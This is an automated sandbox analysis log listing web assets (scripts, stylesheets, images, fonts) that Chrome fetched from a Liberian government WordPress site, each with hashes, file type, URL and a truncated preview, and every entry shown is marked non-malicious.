                                                                                                                        SHA1:9997A1745F48BDD233DBE9BD8164DAA53EBA105B
                                                                                                                        SHA-256:F313D12EA6124BD28FC4A6B7163D253BB83D5AEAB5EDCE594880C5C3DF475CBC
                                                                                                                        SHA-512:AA10DDC5B29905C60A058FAED3F5F195F7577CEAC46489E02461B5135732194DAA3AEF4AA473127BF8C753312E02074CFDAC8D0F8F0CC8AA544C7F8E02BEBD08
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x25]+/,modulo:/^\x25{2}/,placeholder:/^\x25(?:([1-9]\d*)\$|\(([^)]+)\))?(\+)?(0|'[^$])?(-)?(\d+)?(?:\.(\d+))?([b-gijostTuvxX])/,key:/^([a-z_][a-z_\d]*)/i,key_access:/^\.([a-z_][a-z_\d]*)/i,index_access:/^\[(\d+)\]/,sign:/^[+-]/};function a(t){return function(t,e){var r,n,o,s,l,u,p,c,f,d=1,h=t.length,g="";for(n=0;n<h;n++)if("string"==typeof t[n])g+=t[n];else if("object"==typeof t[n]){if((s=t[n]).keys)for(r=e[d],o=0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:PNG image data, 1536 x 1152, 8-bit/color RGB, non-interlaced
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):2579369
                                                                                                                        Entropy (8bit):7.961868189915569
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:49152:7cZtWP+C83t6UbXjnSqZcDqro4VXQAZQSaGhnVY5kKtsY8XrTTYUOLJz9M:7cXCqcUrzSicDqvV5x7AkKaYST+/M
                                                                                                                        MD5:B364E6F92991BB52F9BB1563996733BF
                                                                                                                        SHA1:BDC6C8F8C6FF1858FED73A8A4EA8F97F5113F7EB
                                                                                                                        SHA-256:0D90D98D6C223E0FE7025237560AA57C821B6B9EF5DAE91E307D18E24636C0D9
                                                                                                                        SHA-512:004C908BB32BD6C99AE4D35DDCB67C32F648A5BDA1267384B586B9CA00B80FF1CFFC22985028F63DF093E4871FC68D40E1B5B99D54A09F6F1353E18AF4105BF5
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image.png
                                                                                                                        Preview:.PNG........IHDR.....................pHYs................PiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmpMM:DocumentID="adobe:docid:photoshop:fb1dc683-5ed9-b646-9198-6bcc13239b29" xmpMM:InstanceID="xmp.iid:3e922ac1-1a00-7046-b128-92e5d6655a30" xmpMM:OriginalDocumentID="95BEA589391C7E10A2A2D9F16F0E45C0" dc:format="image/png" photoshop:LegacyIPTCDigest="E8F15CF32F
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (43235)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):43332
                                                                                                                        Entropy (8bit):5.088989438948185
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:6rkk/123F9Ndi68GAFQGpNtYh81+bnDYdXRRM/20YCQCsFSPzdGwKz7RFmYf:CjpFQGpNvXSGwKPiYf
                                                                                                                        MD5:3D6F0BE362F0BC0BAC7F056EC339CC02
                                                                                                                        SHA1:22C45CB29529B5A8A4DAB61FD031E2586811E9CB
                                                                                                                        SHA-256:887AA719FC52054A7695713B2DDA65AB68398C95B43A6785EF4C8009CDFFFFA7
                                                                                                                        SHA-512:6D1D06CC682007A713B8AF87BE820F246A8F44E578F2FD9F57C9869C273934DAB9918A2D0597C2953F96ED6148588954B0C9961BDA984226D2BA0C05D1414B85
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/**. * Slider. * Slick.js. * 1.9.0 | Ken Wheeler | http://kenwheeler.github.io | MIT license. */.!function(i){"use strict";"function"==typeof define&&define.amd?define(["jquery"],i):"undefined"!=typeof exports?module.exports=i(require("jquery")):i(jQuery)}(function(i){"use strict";var e=window.Slick||{};(e=function(){var e=0;return function(t,o){var s,n=this;n.defaults={accessibility:!0,adaptiveHeight:!1,appendArrows:i(t),appendDots:i(t),arrows:!0,asNavFor:null,prevArrow:'<button class="slick-prev" aria-label="Previous" type="button">Previous</button>',nextArrow:'<button class="slick-next" aria-label="Next" type="button">Next</button>',autoplay:!1,autoplaySpeed:3e3,centerMode:!1,centerPadding:"50px",cssEase:"ease",customPaging:function(e,t){return i('<button type="button" />').text(t+1)},dots:!1,dotsClass:"slick-dots",draggable:!0,easing:"linear",edgeFriction:.35,fade:!1,focusOnSelect:!1,focusOnChange:!1,infinite:!0,initialSlide:0,lazyLoad:"ondemand",mobileFirst:!1,pauseOnHover:!0,paus
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=12, height=1080, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1440], baseline, precision 8, 480x360, components 3
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):40323
                                                                                                                        Entropy (8bit):7.759253232336891
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:O3y/ZnBEqgIhkONrna+zcnQq3mU5wI5nWCZpUBkvnUv54fIYZ:O3kZn+q5iOZ8wUuknbwWPiAT
                                                                                                                        MD5:2AA3DA0C6C9E83F7E5A0DA2A3BB643B4
                                                                                                                        SHA1:53FE9F6306BA67B77ECD865C0CAA9B1C76D145FF
                                                                                                                        SHA-256:041B8DB02822509DF27B83AF831324ED8ABDB8406F53BB20C0B7C0D32AC1BF81
                                                                                                                        SHA-512:E3C959602DB22F7EF266DF736D0706DE3E448261025E3470FF8991E5FDA3CF3F84C05455CE52DAA4196CE11FDAE7D814325BFAB87192CEF8AB8758621B82894D
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*...........................8...........................................................................(...........1...........2..........i............. .........H.......H....Adobe Photoshop 21.2 (Windows).2024:01:10 14:19:33............0231...................................8...............................n...........v.(.....................~...........5.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................x...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..4.IH.I(]o.S...n.*n...2[.`.....-f%......>.o.6.i"@Y,...i.R\..
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:PNG image data, 408 x 464, 8-bit/color RGBA, non-interlaced
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):18160
                                                                                                                        Entropy (8bit):7.9507935414647015
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:E6bVK9GIzUQWsZdSawiqS61S3z+Ai3Azy1tL62pW1l0Z86vjNPTN:E6pLIAw2aFqSWS3z+AMZ3k/6vhN
                                                                                                                        MD5:CC6D2A2EBBDB4CA2D35C2A94F666E56C
                                                                                                                        SHA1:7B9695FBE92878E751DB650F89A9E9A74279EE10
                                                                                                                        SHA-256:DEDCB23076BE667A897F4A90BDE0BC80C6A6A58CFE68433BDE59546EB9B74EB5
                                                                                                                        SHA-512:C9E27F2AAF2AEF1CA88C45EBA39DB2D1C16BAF6886EDDB39FB6723A97320E31697FB53AA8B885B1E445D2F361F91BE0A75B14399D990953D543735A400320E16
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
                                                                                                                        Preview:.PNG........IHDR..............0|T..F.IDATx..[l\G..Gq[.j..-.......Q.b....:.=.K.6@#KP..U.!(B&!..i......j.B.$>g...%.(.u..H.T.....P5q..gw......H.b;.b.....f...d.....3C.....B..W.Y..o....c..>k..M$x..L....x"...@..>..N.\..}o>'...Z.=.bd.[c..g.w.9~......!....<E......!....QCd...#_..w.....r7.>...U*..?....u...[G.....wG4....+....X...-.R>.,z:.X.X....c.B%60u).._...g.:......._.[...N...t-.)S.J.g<...:.3.Dv.........T..z.#..y_PL......~.nv.k...Z.#...G..^.D..k...jS..m....Ti.J......*..e _..j.,3j..."..4....#.!sSZ@....RS.K..1.~..d.t.Ra.........T7....L..RK4].....h....\...L./....Q...o.Y-...9.EF.].;!.NS.9.e3..!.2....U..T.'.....%c..IC2.....W.S...v?...MP.{[..7&...t.....p.........V.NF5..J....+5=n%..?T..$.....GK...&..-....3:'(.........}...-...zv2...m.T..V.R.d.Z.......a~.G.xz....M..KT...P....7......X..h<}.d..`.NU;>}|^0k#"S1..^.i..3L.r.9|Os.......S..>V.;.xy4..d...*.Z.|f.pKL.....:.........=.~....;z..n...M.D1.OMC2.L..Sc..f..G.Y..L.&..h&.hX.}m..XW....P.zU..&.....d ..+.i.h.u&B......r....
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4049
                                                                                                                        Entropy (8bit):4.596263386141431
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:fmi/ERn8Ets9xca12/ARUR4BNxdTmkoFPhpuLvr:fmMERnjt4xIEBNeTFZp2T
                                                                                                                        MD5:8DEFF7985DB0AB5EEEB88C9039438C61
                                                                                                                        SHA1:631008039E2D67299CA555589B719CFBF273ED39
                                                                                                                        SHA-256:19906E9585E0F90C005878EE2C63FCD8D1ED933A0EF6BEA16BB1A2226B075B40
                                                                                                                        SHA-512:31D15201401990A1EE4FBF43D35D8B9E31E38CA49A6034927D2BF6886F2BDB79A3765ADC278F9FB68EB9E059446D64525818B8FC897D5C1B78645B8136C8E1AB
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/**. * Parallax. *. * Translate3d. * 1.0 | Muffin Group. */..var mfnSetup = {. translate: null.};..(function($) {.. /* globals jQuery */.. "use strict";.. /**. * mfnSetup. */.. // has3d.. var has3d = function() {.. if (!window.getComputedStyle) {. return false;. }.. var el = document.createElement('div'),. has3d;.. document.body.insertBefore(el, null);.. if (el.style.transform !== undefined) {. el.style.transform = "translate3d(1px,1px,1px)";. has3d = window.getComputedStyle(el).getPropertyValue('transform');. }.. document.body.removeChild(el);.. return (has3d !== undefined && has3d !== null && has3d.length > 0 && has3d !== "none");. };.. // __construct.. var __construct = function() {.. if (has3d()) {.. mfnSetup.translate = function(el, x, y) {. el.css('transform', 'translate3d(' + x + ', ' + y + ', 0)');. };.. } else {.. mfnSetup.translate = function(el, x, y) {. el.css({. "left": x,.
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:HTML document, ASCII text, with very long lines (13452), with no line terminators
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):13452
                                                                                                                        Entropy (8bit):5.1747520643334255
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:IsIRHeFJ1yQ7QdfnJgeYh7MXlsNqrBp1pgQpwOjNtqohIQ/5Z:IsIR+L1yQ7QdpYh7M1iqrBp1pgQpwOjn
                                                                                                                        MD5:2912C657D0592CC532DFF73D0D2CE7BB
                                                                                                                        SHA1:70A679E2769825236F83BCC56965A9D0BD86C4E9
                                                                                                                        SHA-256:DDCCE687729CB358ABF9D0D8E1217A097859BE2B0D18C23D7C851B38C87BC9C0
                                                                                                                        SHA-512:9646384E65D09BF00CB20365F43E06DD41E7428E3FC6CC2737F4E69B50F006EBB25BD24A566FCD9FAEC2F0DCB24404E25D57BA7B8C6ABA61797A29C515AD5144
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0.2
                                                                                                                        Preview:(()=>{"use strict";const e=window.wp.i18n,t=e=>Math.abs(parseInt(e,10)),a=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},n=(e,t)=>{const n=new Map([["init","init"],["validation_failed","invalid"],["acceptance_missing","unaccepted"],["spam","spam"],["aborted","aborted"],["mail_sent","sent"],["mail_failed","failed"],["submitting","submitting"],["resetting","resetting"],["validating","validating"],["payment_required","payment-required"]]);n.has(t)&&(t=n.get(t)),Array.from(n.values()).includes(t)||(t=`custom-${t=(t=t.replace(/[^0-9a-z]+/i," ").trim()).replace(/\s+/,"-")}`);const r=e.getAttribute("data-status");if(e.wpcf7.status=t,e.setAttribute("data-status",t),e.classList.add(t),r&&r!==t){e.classList.remove(r);const t={contactFormId:e.wpcf7.id,pluginVersion:e.wpcf7.pluginVersion,contactFormLocale:e.wpcf7.locale,unitTag:e.wpcf7.unitTag,containerPostId:e.wpcf7.containerPost,status:e.wpcf7.status,prev
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (44186)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):44260
                                                                                                                        Entropy (8bit):5.4668669104082115
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:gXHw8U/5KUTJ4dch4AAAAAATCLL5BI0PRHGrY8VdCCq/3t5IkwC9jRRdyFINGSzY:qwF9XkBtEJHaGgoW
                                                                                                                        MD5:07AE3B6B3B89501942776C01CC7F195A
                                                                                                                        SHA1:B2744F043034B7DFD5732A21748E5868EF882A5F
                                                                                                                        SHA-256:83A0CEF96BEF8FD0B1AE3D260BD2CFA992D821820D435F54FCF274D09726379D
                                                                                                                        SHA-512:1002B348A7B1F8F5C2D14F4E1B5DEBD74E7DCAC8EB8E4244A59A0E3429D96B498144E636F2204E3B165212B515C352F32EBDBE5393E147BCCF08F2A2754549AA
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/pako/2.0.4/pako.min.js
                                                                                                                        Preview:/*! pako 2.0.4 https://github.com/nodeca/pako @license (MIT AND Zlib) */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).pako={})}(this,(function(t){"use strict";function e(t){let e=t.length;for(;--e>=0;)t[e]=0}const a=256,i=286,n=30,s=15,r=new Uint8Array([0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0]),l=new Uint8Array([0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13]),o=new Uint8Array([0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,3,7]),h=new Uint8Array([16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15]),d=new Array(576);e(d);const _=new Array(60);e(_);const f=new Array(512);e(f);const c=new Array(256);e(c);const u=new Array(29);e(u);const w=new Array(n);function b(t,e,a,i,n){this.static_tree=t,this.extra_bits=e,this.extra_base=a,this.elems=i,this.max_length=n,this.has_stree=t&&t.length}let g,p,m;function k(t,e){this.dyn_
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):43
                                                                                                                        Entropy (8bit):2.7374910194847146
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                        MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                        SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                        SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                        SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://mc.yandex.com/metrika/advert.gif
                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (20134)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):20240
                                                                                                                        Entropy (8bit):5.3169647300574665
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:w7gsUMAY6541hpzXKpGdyZ0yE5kh5/rAdE6Dq3M7YqjDbgD6:agnNEDr9Vkh5cS6WcVYD6
                                                                                                                        MD5:292BCDF90948053977B80F167878EB64
                                                                                                                        SHA1:C22CF9127F7AC360C63D9787648498687D4FE26A
                                                                                                                        SHA-256:82705ACBECDD84306CE33E08F576ECA6A688896895E6E48D1C36A4071FCBA14E
                                                                                                                        SHA-512:64EF1DF25B4516EBF59C69F6394B4DE057B32E343753B2FBA21706C9ACAD1B32F3D14753F3B4FAD0EC46F4BBE3FAF7EF2856A6E6A93DB61586D90123CC9A7097
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/js/plugins/magnificpopup.min.js?ver=27.0.7
                                                                                                                        Preview:/**. * Magnific Popup. * 1.1.0 | Dmitry Semenov | MIT | http://dimsemenov.com/plugins/magnific-popup/. */.(function(a){typeof define=="function"&&define.amd?define(["jquery"],a):typeof exports=="object"?a(require("jquery")):a(window.jQuery||window.Zepto)})(function(a){var b="Close",c="BeforeClose",d="AfterClose",e="BeforeAppend",f="MarkupParse",g="Open",h="Change",i="mfp",j="."+i,k="mfp-ready",l="mfp-removing",m="mfp-prevent-close",n,o=function(){},p=!!window.jQuery,q,r=a(window),s,t,u,v,w=function(a,b){n.ev.on(i+a+j,b)},x=function(b,c,d,e){var f=document.createElement("div");return f.className="mfp-"+b,d&&(f.innerHTML=d),e?c&&c.appendChild(f):(f=a(f),c&&f.appendTo(c)),f},y=function(b,c){n.ev.triggerHandler(i+b,c),n.st.callbacks&&(b=b.charAt(0).toLowerCase()+b.slice(1),n.st.callbacks[b]&&n.st.callbacks[b].apply(n,a.isArray(c)?c:[c]))},z=function(b){if(b!==v||!n.currTemplate.closeBtn)n.currTemplate.closeBtn=a(n.st.closeMarkup.replace("%title%",n.st.tClose)),v=b;return n.currTemplate.clo
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (6505)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):9711
                                                                                                                        Entropy (8bit):5.046124748440265
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:o96hIQ3HF3+nTPnikuQ1o+QZppDlX3w3Ibz3+P3GKoTwzf8dPVTnwqMKfXyLBPhC:okCzlo+QxHK8rwqFC2D
                                                                                                                        MD5:F81285DCFBAD6BCD0ECFA031DA4222EE
                                                                                                                        SHA1:E285B4E561D9430BBCD567C04EEF43A72EEE691F
                                                                                                                        SHA-256:10F8E5F272C9AE8C8271AB51D7310AAF9C9BED694104DBE6FF10D99849D19AB8
                                                                                                                        SHA-512:84B883781051F0E55B749931B51D495AE9CEA19C591B7CC6A3EEF53C6DD11FFA056244ACFDA2A18692CC91CC047DE06CEBEAFD93284511B9632666C3AF6A6AE1
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.min.css?ver=27.0.7
                                                                                                                        Preview:div.jp-audio,div.jp-audio-stream,div.jp-video{background-color:#f8f8f8;color:#666;font-family:Verdana,Arial,sans-serif;font-size:1.25em;line-height:1.6;position:relative}div.jp-video-full{height:270px;position:static!important;width:100%}div.jp-video-full div.jp-jplayer,div.jp-jplayer > video{height:100%!important}div.jp-video-full div div{z-index:1000}div.jp-video-full div.jp-jplayer{left:0;overflow:hidden;position:fixed!important;top:0}div.jp-video-full div.jp-gui{height:100%;left:0;position:fixed!important;top:0;width:100%;z-index:1001}div.jp-video-full div.jp-interface{bottom:0;left:0;position:absolute!important}div.jp-interface{-moz-box-sizing:border-box;bottom:0;position:absolute;width:100%;height:30px;background-color:rgba(50,50,50,.8)}div.jp-controls-holder{clear:both;height:0;overflow:hidden;top:-8px;width:440px;margin:0 auto}div.jp-interface ul.jp-controls{list-style-type:none;overflow:hidden;margin:0;padding:0}div.jp-audio ul.jp-controls{width:380px;padding:20px 20px 0}div.j
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:PNG image data, 1536 x 1152, 8-bit/color RGB, non-interlaced
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):117919
                                                                                                                        Entropy (8bit):7.905769870036738
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:bhD6jApvM/RDfqRvmsobCcTyphdILUszAqUHMQBz/PQDUldNladyhj44Zr6VWuOE:wYeV6kWp3ILUszAXhJcYo8vZrrE
                                                                                                                        MD5:75C34A9E28E6C75A5F5488C785803FAA
                                                                                                                        SHA1:179070C4B00392E44E95B6336E23A9B55CCB35A7
                                                                                                                        SHA-256:D2478557517388C8B01CAC502678868EC7498C0E9003EF3B3EC2855C11C5AED1
                                                                                                                        SHA-512:3788D625810B295CFFFD2ABC7609142326A6855C8E8B911BDE9EA1252F0A914418306D2B98E4578F153491E4BFA2E2FDADC3AE14205141EFE5796BFCDDEA58BD
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1.png
                                                                                                                        Preview:.PNG........IHDR.....................pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.2 (Windows)" xmp:CreateDate="2024-02-05T09:33:43Z" xmp:ModifyDate="2024-02-05T10:28:36Z" xmp:MetadataDate="2024-02-05T10:28:36Z" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:f7cbdc1c-a305-0d4b-92bb-9ecdbdc4ec0d" xmpMM:DocumentID="adobe:docid:ph
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 44192, version 1.0
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):44192
                                                                                                                        Entropy (8bit):7.995190968493439
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:768:dji8cRMN2W5RiThDSklZ8iD/ZbANTt4V7NIPuezvbzstqP+l7rx4HDgcq:dteE2WriTsOhzVMfTEqPI7rxkDPq
                                                                                                                        MD5:1C278435B6738E80614EFD67B0AA1D75
                                                                                                                        SHA1:553A407DCCBF2E476E53A88B9BD5C625C48D8F99
                                                                                                                        SHA-256:9EC9EB9108F1752C30BA316606858D685A112A609D8BEF1FB3D5D32C8E0B6507
                                                                                                                        SHA-512:7B05BC06E51A460927D557DEB8DEEA554C692B6EDD381ED2E1E98DAEBB026B3DE471C56278114F48A31C075D2DEA30200ACEE2F2A804246BDFDE61BE1487F9EE
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkBnka.woff2
                                                                                                                        Preview:wOF2............../p...(..........................p.....t?HVAR.}.`?STAT.J'...B..~.../~.....d..i..X.0....6.$..,. ..z. ..N[..qD....7..&U..v8.w/..%.[.......;..F-.....IIE.J...6....GC'.%+[...h((....f..{...H..i..!s.uut.j.K.r[..L'...E.\..qbB.E.N9..$.(.d?...y.9...}G..J...u...L..g.n......,..-....g....'....>\|.}-.&..w.a.$h...pA...5>W...ln..U..[.0<.....g.}..@W.f.V..,...>jN.?O..?..............px..p.,..^..........-.2.0Fl..`..B.d.....~B...A.H...bdR.)0..Z..s#"3....P.[.....%v.....W...#*.vUN...{...k.V....L..)..i.j........./.{!..2<.. :vcfl.s..p.}..}..p.l0..J-m.6.hSM.RW.....~.U.H...9@..........x7.?)TL.N.v...'....i.MH.D....B..2.u........p.kb...J...`!.`aD.6s...O..>.Y..j.....Lf..-..{...s.P}W.Q.W.j[Wgj...Z9."P. Td.7W/T..a...q..A. ..B....2...}Q...dg.S.h..>.[.Z].F.>],T.C.J....B..........c..:.'`.... ....+..X.G.......~..V....5..$C..;f.%..K~.Z....Y g...#.^....k..?5..C....OQ...H..y......L.2.d...~..\|{;..\..;...).05..cm..&..n...e.?..W...+..*3.5........~G#....Qk.]Y.
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (59452)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):59453
                                                                                                                        Entropy (8bit):5.046879488640757
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:D3JjKX72RjOEOKumKDEXEfy1SkdX4Ga4H34i5YfY:tjAEOK1a034NQ
                                                                                                                        MD5:C22FB0DD757E1CED807273954F147634
                                                                                                                        SHA1:396BB656BCE997192A6E73F75D678B754D9EBC66
                                                                                                                        SHA-256:622A07604BB0030BA7094F0F1DCB5D1E9080164FD6BA4071A73452802378B55B
                                                                                                                        SHA-512:E9665EF454BCC53FA34C9DAA180C4DD7FFD563A563819AEC59E82BBCC7C065E54A0CFED4121ACCDB0FCE4A31EC0EA7B92B07B0A20F29F62CFA621EC4CF97B9F8
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/assets/animations/animations.min.css?ver=27.0.7
                                                                                                                        Preview:.animate,.hover-bounce,.hover-flash,.hover-heartbeat,.hover-panic,.hover-pulsate,.hover-pulse,.hover-shakeH,.hover-shakeV,.hover-slingshotCCW,.hover-slingshotCW,.hover-spinCCW,.hover-spinCW,.hover-strobe,.hover-tada,.hover-wave,.hover-wobble,.trigger{-webkit-animation-duration:1s;-moz-animation-duration:1s;-ms-animation-duration:1s;-o-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;-moz-animation-fill-mode:both;-ms-animation-fill-mode:both;-o-animation-fill-mode:both;animation-fill-mode:both}.animate.slow-mo,.hover-bounce.slow-mo,.hover-flash.slow-mo,.hover-heartbeat.slow-mo,.hover-panic.slow-mo,.hover-pulsate.slow-mo,.hover-pulse.slow-mo,.hover-shakeH.slow-mo,.hover-shakeV.slow-mo,.hover-slingshotCCW.slow-mo,.hover-slingshotCW.slow-mo,.hover-spinCCW.slow-mo,.hover-spinCW.slow-mo,.hover-strobe.slow-mo,.hover-tada.slow-mo,.hover-wave.slow-mo,.hover-wobble.slow-mo,.trigger.slow-mo{-webkit-animation-duration:2s;-moz-animation-duration:2s;-ms-animation-duration
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):43527
                                                                                                                        Entropy (8bit):7.98690164688763
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:zccx5nKu48HSqA7vaUnKfJr8pB/4IFCYdK/dwK5sYnE10EUlVsAmL2VXxiQE9faF:zTFnyqb0qJr8p+kTdK/eK5bErojmL21j
